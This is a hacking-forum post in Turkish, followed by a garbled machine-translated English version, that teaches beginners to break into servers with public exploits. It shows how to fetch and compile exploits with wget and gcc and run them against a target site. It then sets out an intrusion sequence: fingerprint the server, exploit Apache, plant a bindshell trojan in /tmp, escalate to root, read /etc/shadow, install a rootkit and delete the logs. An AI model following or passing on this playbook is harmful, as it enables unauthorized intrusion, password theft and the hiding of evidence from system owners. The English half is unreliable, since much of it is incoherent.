Exploit Nedir ve Nasıl Kullanırız? (özellikle Yeni Başlayanlar İçin) (2 Viewers)

Joined
Jun 24, 2016
Credits
0
Rating - 0%
Üzerine kurulu daemon ların açığını kullanarak yada local attack lar düzenleyerek sistemi sahiplenebiliriz.. Bu olayları gerçekleştirirken biz Sistem açıklarını kullanmamızı sağlayan minik programlar olan Exploit leri kullanırız..

Exploit Nedir: Exploitler genel olarak .c ve .pl uzantılı dosyalardır içinde kodlar vardır.. .c uzantılı olan dosyalar C dili ile yazılmış kaynak kodları içerir .pl olanlarda perl dili ile yazılmış kodları içerir.. Bunlar haricinde assembly dili ile yazılmış olanlarda vardır..
Şimdi bu exploitleri yazan şhısların C dilini yalamış yutmuş sistemleri gözü kapalı anlatabilecek seviyede olan hacker lar ın yazdığınıda söylemek isterim.. Exploitler attack türüne göre 2 ye ayrılır..
1- Local Attack..
2- Remote Attack..


Yüzeysel olarak anlatmak gerekirse Local attack uygularken sen olduğun makinadaki kısıtlı yetkini aşıp root olmak için uğraşırsın.. Bunun için local root exploitler kullanılır.. Tabi burda genel konuşuyorum başka amaçlar içinde local Exploitler kullanılabiliyor.. Remote Attacklar ise Alakan olmayan bir makina örneğin bir web server burda senin account un yok bu makinaya local bir attack düzenleyemezsin.. Bunun için remote türü attacklar la remote exploitler kullanılabilir.. Bu remote Exploitlerin bir kısmı seni makineye düşürür sonrasında local root türü bir exploitle root yetkisine geçersin.. Bi kısmıda Remote Root tur içeri düştüğün zaman id kısmında Root yazar.. Kısaca mantık budur.. Exploitler kaynak kod halinde olduğu için bunlar Compile (derlemek) edilmelidir.. Bunun için windows altında çalışan compiler lar mevcut olsada.. Exploitler in geneli Linux makinede Compile edilmek üzere tasarlanır.. Yani o şekil yazılır.. windows altında compile etmek isteyince .h library hatası verecektir.. Linux makinedeki "gcc" Compileri bu iş için çok uygundur.. Exploitleri compile etmek için 1 kaç seçenek doğuyor.. 1 Shell hesabı alarak oradaki gcc compilerini kullanabilirsiniz.. Yada kendi bilgisayarınız herhangi bir Linux dağıtımını yükleyebilir komut satırını shell olarak kullanabilirsiniz.. Tavsiyem shell dir.. Hem komut tabanlı kullanılıyor hemde bağlantı hızı oldukça iyidir.. Shell kvramını bilmeyenler için açıklamak istiyorum..

Shell Nedir : Shell Linux işletim sistemi kullanan bir makineden size verilen kısıtlı yetkilere sahip olduğunuz alan dır.. Bi yerdir yani.. Bu alana putty programı aracılığı ile bağlanılabilir.. Kullanılan port ve protokol ; SSH protokolu ve 22. Porttur.. SSH güvenlidir.. telnet gibi değildir yani.. Bu Shell hesabına ircd kurulabildiği gibi exploit compile olaylarıda yapılabiliyor.. Bu kısım anlaşılmıştır umarım.. birazda putty programına değinelim..
Putty Nedir : Putty Telnet/SSH Clientidir.. Bu programla telnet ve SSH sunucularına rahatlıkla bağlanabilir komutları program üzerinden girebilirsiniz... Kullanımı oldukça basittir..Download bölümünde putty programı mevcuttur.. Şimdi putty i download ettikten sonra... programı çalıştırın... "Host Name ( or IP adress)" yazan kutucuğa shell inizin ip sini yazacaksınız... Hemen o kutucuğun altında "Protocol" seçenekleri var bağlanmak istediğiniz sistemin protokolune göre ordan birini seçeceksiniz SSH sunucusuna bağlanıorsanız "SSH" yi telnet sunucusuna bağlanıorsanız "Telnet" i seçeceksiniz.. Bizim bağlanacağımız sistem linux olduğuna göre ve bu sistem SSH protololu kullandığı için "SSH" yi seçiyoruz.. "SSH" yi seçtikten sonra sağ alttaki "open" botonuna basın... Önünüze siyah bir ekran çıkacaktır buraya Shell username inizi yazın enterlayın.. Pass inizi isteyecek onuda yazıp enterlayın... Shelle bağlanmış olacaksınız... Şimdi Linux makinaya bağlanmış olduğumuza göre bi kaç linux komutundan bahsedeyim...
ls : olduğunuz dizindeki dosyaları listeler.. (örnek: ls )
rm -rf dosyaadi : belirttiğiniz dosyayı siler.. (örnek: rm -rf apache.c)
wget : Dosya çekmeye yarar... (örnek: wget http://xxxx.com/Apache_1.3.x.c)
gcc -o : C dilinde yazılmış programları derleme komutudur... Biz genellikle bunu exploit kodlarını derlemek için kullanacağız (örnek: gcc -o Apache Apache_1.3.x.c)
./ : Çalıştırma komutudur.. (örnek: ./Apache)

Exploit Compile Nasıl yapılır : Şimdi Shell imiz var ve putty programı ile shell imize bağlandığımızı var syarak anlatıyorum... Öncelikle kullanacağımız 3-5 temel komutumuz var.. bunları örneklerle açıklayacağız..

"wget http://xxx.com/Gtkftp_v1.0.4.c" Bu komutla http://xxx.com/Ftkftp_v1.0.4.c isimli dosyayı çekioruz yani wget komutu dosya çekmeye yarıor....
"gcc -o Gtkftp Gtkftp_v1.0.4.c" Bu komutla Gtkftp_v1.0.4.c isimli exploiti derliyoruz... ama derlenmiş olan exploiti Gtkftp adında kaydediyoruz... Bu komutla bu dediklerim oluyo...
"./Gtkftp" Komutu ile bu exploitle birlikte kullanabileceğim parametreleri gördüm... Yani exploiti çalıştırmayı denedim ama yetersiz parametre kullandığım için bana açıklama verdi kullanabileceğim parametrelerin bi listesini verdi....
"./Gtkftp -h www.yyyyy.com" Komutu ile www.yyyyy.com sitesi üzerine bu exploiti çalıştırmayı denedim ama verdiği uyarıda www.yyyyy.com sitesi "<- 220 ProFTPD 1.2.7 Server (ProFTPD) [OEI.guncelturk.net]
[!] error: this exploit is only for GtkFTPd, failed.
" proFTPD kullanıor ve bu exploit sadece Gtk ftp kullanan host larda çalışır dio...
Exloit compile etme ve çalıştırma olayıda açıklığa kavştu Şimdi bir sisteme nasıl girilir onu görelim..

Exploit Kullanarak Sisteme girmek :

Şimdi en can alıcı noktaya geldik... Yukarda örnekle gösterdiklerimi şimdi uygulamaya dökeceğim... Bunun için öncelikle bir hedef belirlemem gerekiyor... www.XXXXXX.com serverlarına gireceğim.. işlem sırasına gelince..
1- www.netcraft.com sitesinden server infosunu almak.. yada sitemizde werdiğimiz scan_projecti kullanarak httpd server infosuna bakmak..
2- Gerekli exploiti temin etmek...
3- Shell ’e login olup gerekli exploiti shell e çekmek ve kullanmak...
4- Servera bindshell kurmak...(bunu loglara kayitlanmamak için yapiyoruz ve ayrıca shelin kapatilmasi söz konusu olabilir..
5- Serverda root olmak...
6- Rookit kurmak (binshelle idare ederim diyorsanız gerek yok)
6- Loglari silmek
İşlemleri sırasıyla yapıyorum...

1- Server infosunu aldım.. Kullanılan server bilgileri şöyle;
The site www.XXXXXX.com is running Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6 PHP/4.0.4pl1 mod_perl/1.24_01 on Linux.
2- 7350 fun Exploit i ile bu servera girebilirim...
3- Shell e login oldum... Exploiti çektim çalıştırdım...
4- HPbindshell i kurdum...
5- ptrace-kmod exploiti ile serverda root oldum...

7350 exploiti kaynak kod halinde deil derlenmiş halde dağıtılıyor ayrıca eski bir exploittir...

7350 yi hebele olarak shell e kaydettim... Kulandığım komuta gelince... Exploit brute force yöntemi ile çalışıor... Ben brute force un etkili olduu kısmı direkt yazarak kısa yoldan sisteme girdim.. Screenshot un sonunda yazan yazılar gelince bi süre bekledikten sonra shell e düşürecektir..Sonraki işlemler... Aslında istesek bu şekilde shell kullanarak oraya girebiliriz... Ama bi süre sonra Read Error verip bizi düşürecektir...O yüzden bindshell türü bir program kurarak bu sorunu hallederiz... Ama öncelikle yazma iznimizin olduğu bir klasöre girelim genel olarak /tmp/ dizininie yazma iznimiz vardır bazı sistem yöneticileri bunuda kaldırıyor ama nadir olan bi olay.. Tmp dizinine geçmek için "cd /tmp" komutunu uygulayın...

Bind Shell kurulumu : Şimdi sisteme bindshell denilen bi çeşit trojan niteliği taşıyan bir program kurmak gerekecek.. amacı sistemdeki belirli bir portu bindshell olarak açması ve buraya bağlanmayı sağlamasıdır.. Exploitle içeri düşünce bi nevi shell hesabımız oluyor o makinada.. ama anonymous bir shell.. id mizde nobOdy yada farklı bişey yazar.. Normal de Shell hesabı olanların /home/ dizini altında bir klasörü olur.. Gerçi klasör olayı root a bağlıdır ama geneli böyledir.. bu Anonymous girişte bu dizin altında klasörümüz olmaz.. bindshell kuruyoruz çünki her zaman exploiti kullanıp sisteme remote attack düzenlemek zorunda kalmayalım diye.. Her zaman Exploitin sonuç vereceği kesin değildir açık patch lenmiş olabilir.. ve Exploitlerin kısa sürede sonuç vereceğide kesin değildir.. Neyse bindshell kurulumunun anlatılacak bi tarafı yok ./bindshel deyip kurulur.. Sonrasında sistem hakkında biraz bilgi alarak siste! min nasıl rootlanacağına bakılır.. "uname -r" Komutu ile kernel in sürümü öğrenilip buna göre local root exploit uygulanabilir yada "ps x" gibi komutlarlada çalışan uygulama ve programlara görede bakılabilir.. Burada biraz Linux bilgisi ister... Şimdi şu kısıma dikkat edin.. Öncelikle bir remote attack düzenledik sisteme girdik.. Şimdi ise bir local attack düzenleyip root olmaya çalıştık.. işlem sırası o şekilde ilerliyor.. Önce sisteme girmek gerekir sonra local bir attackla sisteme sahip olamk gerekir... Sistemde bir hesabınız olursa remote attack kısmını eleyip local attack yöntemlerine bakarsınız olay bu... Sistemdeki Şifreleri almak için "cat /etc/shadow" komutunu uygulayıp /etc/ dizini altındaki "shadow" isimli dosyanın içeriği ekrana basabilir shadow pass leri alabilirsiniz.. ama sistemde root olduktan sonra ne gereği varki zaten sistemdeki istediğiniz her dosyaya her siteye erişim sağlarsınız.. Root olduktan sonra sisteme bir rootkit kurarak gizli giriş çıkış yapabilirsiniz..

(alıntı yapılarak derlenmiştir....)
 
Joined
Jun 24, 2016
Credits
0
Rating - 0%
eng plz :*
Attack the system by using the holes on the Board or the local daemon that s when performing editing.. we can claim these events, we use s tiny programs that exploit the vulnerabilities of the system that allows you to use..
What is Exploit: Exploits generally .C ... there are codes in the files with PL extension .contains the source code of C extension files written in C language .those written in the language perl includes code pl.. except for these, the ones with written in assembly language.
Now these exploits his eyes closed he swallowed licked by the C language by the parties will be able to describe systems in which the hacker exploits the level 2 According to the type of attack type of when I'd like to say.. divided by..
1 - Local Attack..
2 - Remote Attack..

If you need to tell the machine you are applying superficially attack the local root local root exploits for that you exceed your authority and try to become limited.. of course I'm talking here is used for other purposes can be used for local Exploits remote attack.. something to do with non machine, for example, a Web server local to the machine your account is no flour here ... that you can't organize this type of attack the attack exploits Remote for remote control this remote can be used ... a la some of you local root exploited to the machine type root privileges after you move the lowers.. When you fall in BI Part Type remote root, Root Control.. it is logic.. the writer briefly in the part id in source code form, because these are Compile (compile) for Windows ... when running under s.. It should be available to decompile the compiler exploits on the machine so that Linux in general are designed to be in shape.. when asked to compile under Windows is written .h library on the Linux machine will give an error.. "gcc" to compile their exploits compi it is very suitable for this job.. 1.. Option 1 is born having a shell account there, you can use the GCC compi. You can install any Linux distro on your own computer or the command line shell.. Shell command.. you can use it as both and my advice is based is used the connection speed is very good.. I want to explain for those who don't know the concept of shell.

Shell : shell is a machine that uses the Linux operating system is the area that has limited powers given to you in this field ... she has a point.. I mean.. that is Connectable through the program port and protocol used putty SSH Protocol 22. Telnet port SSH is Secure Shell account.. is not like.. I mean.. This.. this exploit can be made in the event part can be installed as RCD compile the program.. let's have a look at some putty and I hope you understand..
Putty : putty Telnet/SSH is a Telnet and SSH client.. with this program you can enter the commands that can be easily connected to servers through the program..the program is very easy to use... are available in the download section.. now after I download putty in putty, run the program... "host name ( or IP address) in the box that says" allowed IP box under sini... now that you will write in the shell "Protocol" options, choose one from there according to the protocol of the system you want to connect to the SSH server if you're going to baglanior "SSH" baglanior if the Telnet Server "Telnet" I will choose.. We connect the US system is Linux, and this system because it uses the SSH Protocol to "SSH".. we're choosing to "SSH" then select click in the bottom right "open" button a black screen will appear type here your username in front of you that will pass.. shell enterlayin want to write, too... you'll be connected to the Linux machine connected to the shell enterlayin... now let me tell you about the Linux command that we are few...
ls : lists the files in that directory.. (example: ls )
rm-rf filename : deletes the specified file.. (example: rm-rf apache.c)
wget : File yank... (example: wget http://xxxx.com/Apache_1.3.x.c)
GCC-o : programs that are written in the C language compile command to compile the codes, we will use... We usually exploit it (example: GCC-o Apache Apache_1.3.x.c)
./ : Command to run.. (example: ./Apache)

How to compile exploit : now that we have our shell and shell bookmark with the program putty connected to the first dick I'm telling you... we got.. we have we will explain them with examples 3-5 basic commands that we will use..

"wget http://xxx.com/Gtkftp_v1.0.4.c" with this command http://xxx.com/Ftkftp_v1.0.4.c so we're making it helps you get a file called a command file wget....
"GCC-o Gtkftp Gtkftp_v1.0.4.c" command Gtkftp_v1.0.4.the named exploit the exploits in the name... but we're compiling C compiled with this command gtkftp's what I said... We are making this...
"./GTK FTP" command with the parameters I saw that I can use with this exploit running exploit... so I tried, but gave me an explanation I can use an out parameter because I use a list of parameters that gave....
"./GTK FTP -h www.yyyyy.com the command" www.yyyyy.com I tried running this exploit on the site, but gave no warning www.yyyyy.com the site "<- 220 ProFTPD 1.2.7 Server (ProFTPD) [OEI.guncelturk.net]
[!] error: this exploit is only for GtkFTPd, failed.
"proFTPD is using this exploit only works during Dio and GTK host using FTP...
Compile and run the exploit, the event is entered into a system that let him see How have been clarified now."

Exploit the system by using enter :

Now we come to the most crucial point, so now I will pour out... into practice what I showed with the example above to do this, first set a goal I need to... www.XXXXXX.com when it comes to process servers, I'm going to....
1 - www.netcraft.com get the info from the site server, or a httpd server using the info in our site we werdig scan_projecti look..
2 - the necessary control to assure...
3 - E to the shell login and shell take and use exploit required...
4 - Servera bindshell build...(not being able to register and also for logos that we're doing it for shelin may be subject to closure.
5 - become root on the server...
6 - Rootkit install (no need to say I'll manage to binshell)
6 - delete the Logos
Operations, respectively, I'm doing...

1 - you used.. I got the info Server Information Server;
The site www.XXXXXX.com running Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6 PHP/4.0.4pl1 mod_perl/1.24_01 on Linux ten.
2 - I can get into the server 7350 fun with this exploit...
3 - I ran...I pulled... I've been e login Shell Exploit
4 - I built HP bindshell...
5 - handler-root exploits on a server with gmod I'm...

7350 exploit is distributed in source code form, not in compiled, but also an old exploit...

7350 e I Yi recorded... as well as for the commands I use shell, it works... un Exploit brute force method brute force to be effective in the short way by writing directly to the part of the screenshot.. I'm waiting for a while when it comes to the articles that he wrote at the end, after the processes in the way that we want..it will E next lower shell using the shell we can go in there actually... but after a while gave a read error and will keep us down so we can fix this problem by establishing the type of program bindshell... But first, get a folder where we are allowed to write and, in general, the /tmp/ directory that has write permission to this too is picking up some system administrators, but a rare event to change to the tmp directory.. "cd /tmp" command apply...

Bind Shell setup : now the system attribute to build a program with a Trojan of some sort called bindshell.. the bindshell port open and you'll have a specific purpose in the system.. as in a shell Le to connect here is the exploit that will provide the kind of thinking that we have a shell account machine Mister anonymous.. nobody.. but.. those with a shell account or something different author ID at /home/ directory is a folder under the root folder of the event though.. depends on a, but in general, that is the case.. we won't have a folder under this directory at the entrance to this anonymous.. bindshell exploit the system and use all the time because we're setting up remote attack exploiting will yield results so that we don't always have to organize clear patch of exploits ... and it is not certain that it can be ed give in.. anyway the setup is not precise results in a short period of bindshell does not have a bi side that will be told ./bindshell.. then saying the system is contacted by taking a little information about in the fog! min rootlanac how he looks.. "uname-r" command or the kernel local root exploit, and accordingly learned can be applied to the version of "ps x" on the LAN is running and the application program according to commands such as can be taken. Here are some Linux knowledge you want first notice that part... now.. now.. we're in a local attack, remote attack organized system ... we tried to be root to edit the operation sequence of the system before heading that way.. you will need to enter in the system and then a local attack... if you have an account you need to have a system by eliminating remote attack local attack in the event you look at the portion of the methods in this system to get the passwords you type "cat /etc/shadow" command, applying and /etc/ directory under the "shadow" on the shadow pass back the contents of the named file on the screen press you can receive. but there was no need for that after the root system is already in the system each file that you want to root after installing each system you get access to the site.. you can enter and exit hidden by a rootkit on..
(the quote has been compiled by....)
 

Users who are viewing this thread

Top